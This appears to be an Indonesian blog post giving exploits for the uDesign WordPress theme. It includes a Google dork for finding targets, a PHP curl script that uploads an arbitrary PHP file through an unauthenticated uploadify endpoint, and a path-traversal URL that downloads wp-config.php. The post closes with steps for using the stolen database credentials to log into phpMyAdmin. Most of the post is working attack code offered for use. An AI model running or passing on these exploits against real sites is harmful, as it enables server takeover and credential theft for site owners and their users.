#-Author: Tn_Scorpion
#-Date: 18/01/2015
#- Vendor : Themeforest
#- by : andondesign
#- Link Download : themeforest.net/item/udesign-responsive-wordpress-theme/253220
#-Google Dork: inurl:wp-content/themes/u-design
#- Tested on : Windows 8
--------------------------------------------------------
Multiple Vulnerabilty
Kenapa ? karena themes ini mempunyai dua bug sebenernya, tapi yang tenar cuma File uplod vulnerabilitynya doang :'v sebenernya ada ada lagi yaitu Arbitrary File Download Vulnerability. ok cukup ~
Proof Of Concept :
--
File uplod vulnerability
--
<?php
$uploadfile="3xploi7.php";
$ch = curl_init("http://3xploi7.id/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/themes/u-design/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Result : Here !
--
File Download Vulnerability
--
http://3xploi7.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
1. Download Confignya
2. Buka dan cari user pw dbnya
3. login di web.com/phpmyadmin
4. terserah anda.
Tidak ada komentar:
Posting Komentar